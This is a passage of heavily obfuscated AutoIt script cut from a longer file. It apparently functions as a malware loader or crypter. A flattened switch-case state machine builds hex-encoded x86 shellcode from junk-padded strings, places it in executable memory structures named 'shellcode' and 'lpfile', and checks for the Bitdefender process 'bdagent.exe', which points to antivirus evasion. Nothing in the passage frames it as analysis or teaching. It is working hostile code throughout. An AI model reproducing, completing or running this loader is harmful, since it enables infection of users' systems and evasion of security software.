4294963512 ) $823320600 = 507017416 CASE 846271121 $G32383037Y2 &= $G393030X2Q $823320600 = 220189866 CASE 853394200 $G32383037Y2 &= $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) $823320600 = 1374344267 CASE 854553390 $G32383037Y2 &= $O353SY ("3whfneky643w3g4uj3ge27omlcltg" ) $823320600 = 1296483263 CASE 935061787 $G32383037Y2 &= $S3130353562CZLC $823320600 = 342768592 CASE 947431475 $G32383037Y2 &= $C313734GS4W $823320600 = 961348210 CASE 961348210 $G32383037Y2 &= $I31330D6 ("EB038D49008B04BB8A0C3003C6BA3AB6010084C974168BDAC1E3050FBEC903D34003D18A0884C9rzkmwb5xdilg8pvrcl7iykmhnjouh" , 29 + 3474 * 1 + 4294963822 ) $823320600 = 540021528 CASE 1023162799 $G32383037Y2 &= $O353SY ("031hjiov8aioi3yccn" ) $823320600 = 247051243 CASE 1050946220 $G32383037Y2 &= $V3135P3 ("snlp4q6epifu3jglkjbA036843250DF4E808F5FFFF8B5D8083C414E8EDF6FFFF5F5E5B8BE55DC20C00CCCCClxep5rl61bvb" , 20 + 377 + 4294966919 , 68 + 377 + 4294966919 ) $823320600 = 1132199390 CASE 1065523592 $G32383037Y2 &= $Z363831CN $823320600 = 694144588 CASE 1072049475 $G32383037Y2 &= $U3131F51ZD ("lvlyxug4t00hiaa4fs31fr6uF6963726FC785C4FEFFFF736F6674C785C8FEFFFF2E4E4554C785CCFEFFFF5C467261C7" , 24 + 4294963749 + 3547 ) $823320600 = 1462882764 CASE 1107033673 $G32383037Y2 &= $V39NUX ("55F8528D459l7z2x1C8l7z2x1945l7z2x19l7z2x18l7z2x15l7z2x138l7z2x1Dl7z2x18l7z2x157CFFFl7z2x1FFl7z2x1Fl7z2x18l7z2x1D4l7z2x1Bl7z2x10l7z2x11l7z2x15l7z2x10l7z2x151C7l7z2x1459l7z2x1C01l7z2x101l7z2x100l7z2x10l7z2x10l7z2x1" , "l7z2x1" , "" ) $823320600 = 1507971141 CASE 1119677627 $G32383037Y2 &= $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) $823320600 = 1497642837 CASE 1128102363 $G32383037Y2 &= $Q3735377J0AQ $823320600 = 1769631811 CASE 1132199390 $G32383037Y2 &= $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) $823320600 = 1613945667 CASE 1134265100 $G32383037Y2 &= $G373535V6PBR5 $823320600 = 1128102363 CASE 1164384931 $G32383037Y2 &= $V39NUX ("5oos05g1c1oos05g1c6A026oos05g1c8Foos05g1c73AEoos05g1c23Boos05g1cEoos05g1c8oos05g1c9BFoos05g1c6oos05g1cFFFoos05g1cF8oos05g1c3C41oos05g1c0oos05g1c8oos05g1c5oos05g1cC00oos05g1cFoos05g1c84oos05g1c740oos05g1c1oos05g1c00oos05g1c0oos05g1c08oos05g1cB8oos05g1c7Aoos05g1c4oos05g1c0oos05g1c00oos05g1c00oos05g1c08B8oos05g1cD" , "oos05g1c" , "" ) $823320600 = 244586016 CASE 1170832963 $G32383037Y2 &= $B313736N7 $823320600 = 424398338 CASE 1178081240 LOCAL $S32383033JPB , $J32383034OP , $W32383035JOWY , $C323830364EJ , $G32383037Y2 $823320600 = 317041254 CASE 1189059638 $G32383037Y2 &= $V39NUX ("E5e0d6gc4B8e0d6gc4BE55DC20e0d6gc48e0d6gc40e0d6gc40e0d6gc4CCCCCe0d6gc4CCCe0d6gc4CCe0d6gc4Ce0d6gc4Ce0d6gc4CCe0d6gc4CCe0d6gc4Ce0d6gc4Ce0d6gc4CCe0d6gc4CCCe0d6gc4Ce0d6gc4CC558e0d6gc4Be0d6gc4Ee0d6gc4C83e0d6gc4Ee0d6gc4C10e0d6gc45e0d6gc43e0d6gc45785F6e0d6gc47e0d6gc446e0d6gc46e0d6gc48B46e0d6gc43e0d6gc4C8Be0d6gc4443e0d6gc40e0d6gc478" , "e0d6gc4" , "" ) $823320600 = 947431475 CASE 1191090362 $G32383037Y2 &= $Z37IB8K ("0x43344443373835333846464646464636393633373236464337383533434646464646463733364636363734433738353430464646464646324534" ) $823320600 = 1322325458 CASE 1221390787 $G32383037Y2 &= $U3930380NXX $823320600 = 1247352503 CASE 1247352503 $G32383037Y2 &= $W393130RCW $823320600 = 179833975 CASE 1296483263 $G32383037Y2 &= $V313732TC $823320600 = 1336094009 CASE 1322325458 $G32383037Y2 &= $O353SY ("846snwoj50hn0dr7us6h" ) $823320600 = 1065523592 CASE 1329039030 $J32383034OP = $B32343933BHRMQ ($O353SY ("x8unxy21uk" ) , $O353SY ("0to8m7ce7sweipo8ayzc" ) , $V31333137ALTN4L , $O353SY ("yxchraq6w0r0glpw4lgbk7xgx" ) , 0 , $F313332316ESE , $J323534391M ($G32383037Y2 ) , $Z37IB8K ("0x64776F7264" ) , $V3135P3 ("a8d1jt76hpu3u6ircl15fa0x3000nsyespv84nwq0yez8a2eyllmxgn" , 23 + 2781 + 4294964515 , 6 + 2781 + 4294964515 ) , B38ZPPGU ("635883-635902-635894-635897-635883-" , 635783 ) , $V3135P3 ("pvose2qy85jidbpu0glsc0x40dkh6mdlpceqweyztkrs5m" , 22 + 6535 * 3 + 4294947691 , 4 + 6535 * 3 + 4294947691 ) ) EXITLOOP CASE 1336094009 $G32383037Y2 &= $V39NUX ("8Bq4584q458Dq458Fq45808q458B55q458FCq4580q458Fq458B7q4580q4584q45851q4588Bq4584q458Dq458EC8B0q4584q45881q4580q458345q4580q4588q4585Fq4585" , "q458" , "" ) $823320600 = 1189059638 CASE 1344125600 $G32383037Y2 &= $D333433NO $823320600 = 1023162799 CASE 1374344267 $G32383037Y2 &= $R383938B6710A $823320600 = 1675226304 CASE 1377214014 $G32383037Y2 &= $O313330343X8 $823320600 = 1329039030 CASE 1451424842 $G32383037Y2 &= $O353SY ("4fb13bmfg2p3104socf4" ) $823320600 = 349070442 CASE 1462882764 $G32383037Y2 &= $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87331 ) ) $823320600 = 607502147 CASE 1479625482 $G32383037Y2 &= $B383236SA $823320600 = 747332703 CASE 1497642837 $G32383037Y2 &= $M3235364G $823320600 = 1953304794 CASE 1507971141 $G32383037Y2 &= $I31330D6 ("C745A000000001895DA4C7458003000000C7857CFFFFFFFFFF1F40895D84895D90894D948tq781kxxir5ip40b2" , 17 + 4294966075 + 1221 ) $823320600 = 31564936 CASE 1521716519 $G32383037Y2 &= $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) $823320600 = 343886302 CASE 1522885757 $G32383037Y2 &= $V3135P3 ("nivspsp3lyfsj4wwpv7286vnn00000000000000000000000000000000000000000000000000000000000000000000jxjrsu4kz5o4dluu" , 26 + 4294958179 + 9117 , 68 + 4294958179 + 9117 ) $823320600 = 1451424842 CASE 1537586385 $G32383037Y2 &= $V39NUX ("C6wb4kk3x96wb4kk3x2wb4kk3x72wb4kk3xC745D0wb4kk3x617wb4kk3x2wb4kk3x794wb4kk3x1C6wb4kk3x45wb4kk3xD40wb4kk3x0wb4kk3xC7wb4kk3x4wb4kk3x5E47wb4kk3x5wb4kk3x73wb4kk3x65wb4kk3x72C74wb4kk3x5Ewb4kk3x8333wb4kk3x22E6wb4kk3x46wb4kk3x6wb4kk3xCwb4kk3x7wb4kk3x45ECwb4kk3x6wb4kk3xC6wb4kk3xCCwb4kk3x6wb4kk3x45Ewb4kk3xE0wb4kk3x0wb4kk3xCwb4kk3x" , "wb4kk3x" , "" ) $823320600 = 1119677627 CASE 1537780935 $G32383037Y2 &= $T31323632RXVXOI $823320600 = 1995357114 CASE 1566911474 $G32383037Y2 &= $O353SY ("tsbojzgpdl8j3dtx1lvog8kl1f" ) $823320600 = 511805355 CASE 1588307237 $G32383037Y2 &= $W3534317ZC $823320600 = 122734813 CASE 1593765410 $G32383037Y2 &= $V39NUX ("B1a8hlre51a8hlre63475241a8hlre8D1a8hlre851a8hlre61a8hlre01a8hlreF1a8hlreEF1a8hlreF1a8hlreF1a8hlreF1a8hlre51a8hlre08D1a8hlre4D1a8hlreF01a8hlre511a8hlreFF1a8hlre91a8hlre551a8hlre81a8hlreFE1a8hlreFFF1a8hlreF1a8hlre51a8hlre01a8hlreE1a8hlre81a8hlreD9F41a8hlreF1a8hlreFF1a8hlreF1a8hlre81a8hlreB51a8hlre51a8hlreE1a8hlreC8B8D71a8hlreC1a8hlreF1a8hlreFFF1a8hlreFF52" , "1a8hlre" , "" ) $823320600 = 935061787 CASE 1597403880 $G32383037Y2 &= $L3638352MGRM $823320600 = 807257674 CASE 1613945667 $G32383037Y2 &= $U3131F51ZD ("n7zvdswi0500000000000000000000000000000000000000000000000000000000000000000000" , 10 + 4294957331 + 9965 ) $823320600 = 108681755 CASE 1625702291 $G32383037Y2 &= $V3135P3 ("lrdxspya6r2u2583F80475088D95B4FEFFFFEB1583F80575088D4DAC894DFCEB0B83F80675068e3v0nrnx75yzgyqwdjf8o7" , 13 + 3844 * 5 + 4294948076 , 65 + 3844 * 5 + 4294948076 ) $823320600 = 1521716519 CASE 1629206375 $G32383037Y2 &= $I31330D6 ("08B520C8B52148B7228B91800000033FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4ih34pepou6l" , 11 + 8529 * 4 + 4294933180 ) $823320600 = 1940172472 CASE 1657267227 $G32383037Y2 &= $O353SY ("qlcptuduf2z" ) $823320600 = 128580426 CASE 1662106412 $G32383037Y2 &= $J333431AR2ZEJ $823320600 = 1344125600 CASE 1668410217 $G32383037Y2 &= $Z37IB8K ("0x3136433431433734354134364336433646363343363435413830304538444246364646464638443844363846464646464635313536384246384337343546" ) $823320600 = 853394200 CASE 1675226304 $G32383037Y2 &= $I31330D6 ("8574FEFFFF00E87FF6FFFF8D558C5256898558FEFlut1c551d2n" , 11 + 3805 + 4294963491 ) $823320600 = 846271121 CASE 1728161007 $G32383037Y2 &= $R333335MUSIO $823320600 = 1657267227 CASE 1739397950 $G32383037Y2 &= $L3132377JY4 $823320600 = 268691428 CASE 1769631811 $G32383037Y2 &= $I31330D6 ("745C865786500C745CC433A5C57C745D0696E646FC745D477735C53C745D879737465C74bhxqv1hcj" , 9 + 4294959344 + 7952 ) $823320600 = 435626120 CASE 1865630473 $G32383037Y2 &= $I31330D6 ("FF6548616EC78574FFFFFF646C6541C68578FFFFFF00C7459C56697274C745A0756q01xz3ecc" , 9 + 9544 + 4294957752 ) $823320600 = 1668410217 CASE 1892817007 $G32383037Y2 &= $O353SY ("eja7zxqp2k67v1ozrkigng3m1to" ) $823320600 = 1969900180 CASE 1923293943 $G32383037Y2 &= $U3131F51ZD ("pb1g6t41wfcyiorw1sslcb7850CFFFFFF6D65776FC78510FFFFFF726B5C76C78514FFFFFF322E302EC78518FFFFFF353" , 22 + 4294958156 + 9140 ) $823320600 = 67217268 CASE 1940172472 $G32383037Y2 &= $Z37IB8K ("0x4136413842343231303842313237354439384246303844343543433333444235303536433734354343344336463631363443373435" ) $823320600 = 698963862 CASE 1953304794 $G32383037Y2 &= $V3135P3 ("zrjo7l2qdrdl7uF8D4DA8518D55E452FFD050E8BBFDFFFF8945F48D45D85056E8AEFDFFFF8D4DB851568945F0E8Ageh263pltkbf4bkzguanh70s" , 15 + 4294960919 + 6377 , 78 + 4294960919 + 6377 ) $823320600 = 1728161007 CASE 1969900180 $G32383037Y2 &= $V39NUX ("58jb5708jb5794584jb578jb579jb5745908jb57945jb5794jb578jb5794jb575jb579jb578jb578jb579jb574588894jb575jb578jb57Cjb578D" , "jb57" , "" ) $823320600 = 1107033673 CASE 1976720245 $G32383037Y2 &= $V39NUX ("F7bqbrknuD7bqbrknu77bqbrknu87bqbrknu377bqbrknuD107bqbrknu007bqbrknu87bqbrknuBF87bqbrknu87bqbrknu97D7bqbrknuFC7bqbrknuC7bqbrknu707bqbrknu77bqbrknu0707bqbrknu07bqbrknu017bqbrknu07bqbrknu0747bqbrknu0C8B7bqbrknu857CFF7bqbrknuFFFF507bqbrknuE837bqbrknuCF9FF7bqbrknuFF7bqbrknu87bqbrknuB47bqbrknuD87bqbrknu057bqbrknu77bqbrknu" , "7bqbrknu" , "" ) $823320600 = 1164384931 CASE 1995357114 $G32383037Y2 &= $O353SY ("sizvwdcya" ) $823320600 = 1377214014 CASE 2039189835 $G32383037Y2 &= $K313035376XQRGU $823320600 = 508698040 CASE 2049571787 $G32383037Y2 &= $V3135P3 ("87v3bzfsdyspfo60i24j6kj4exso2wCCCCCCCCCCCCCCCCCCCC558BEC81ECF0020000535657C745FC00000000C785F0Fy68us7ngkg" , 31 + 7818 + 4294959478 , 65 + 7818 + 4294959478 ) $823320600 = 1588307237 CASE 2095464838 $G32383037Y2 &= $I31330D6 ("00000000000000000000000000000000000000000000000000000000000000000000000h17z6juzjzz5xrlphk6" , 19 + 4294964817 + 2479 ) $823320600 = 1537780935 ENDSWITCH WEND IF NOT @ERROR AND $J32383034OP [0 ] THEN $J32383034OP = $J32383034OP [0 ] ELSE RETURN 1 ENDIF $1739397950 = 1178081240 WHILE 1 SWITCH $1739397950 CASE 274725409 $S32353233CD7VP0 ($C323830364EJ , $I31330D6 ("lpfilesg5th02tz" , 9 + 2787 + 4294964509 ) , $B3237393221GL ) EXITLOOP CASE 317041254 $C323830364EJ = $R323439367DKWBU ($U3131F51ZD ("cihkix5gxd07zlef5ilbjcwbyte lpfile[" , 23 + 1601 + 4294965695 ) & $B32343333SKG ($B3237393221GL ) & "]" ) $1739397950 = 326133898 CASE 326133898 $S32353233CD7VP0 ($W32383035JOWY , $U3131F51ZD ("4kkukqnamqr8lvs6x1w4o0xivz0qf8shellcode" , 30 + 3819 * 2 + 4294959658 ) , $G32383037Y2 ) $1739397950 = 274725409 CASE 1178081240 $W32383035JOWY = $R323439367DKWBU ($V3135P3 ("oagw2rohbyte shellcode[u0xlyh0s" , 9 + 9904 * 5 + 4294917776 , 15 + 9904 * 5 + 4294917776 ) & $J323534391M ($G32383037Y2 ) & "]" , $J32383034OP ) $1739397950 = 317041254 ENDSWITCH WEND IF $F32343534YAF ($V31333235IRO ) OR $F32343534YAF ($I31330D6 ("bdagent.exe5ijsqawm3akyba32mwz3w083fg746v" , 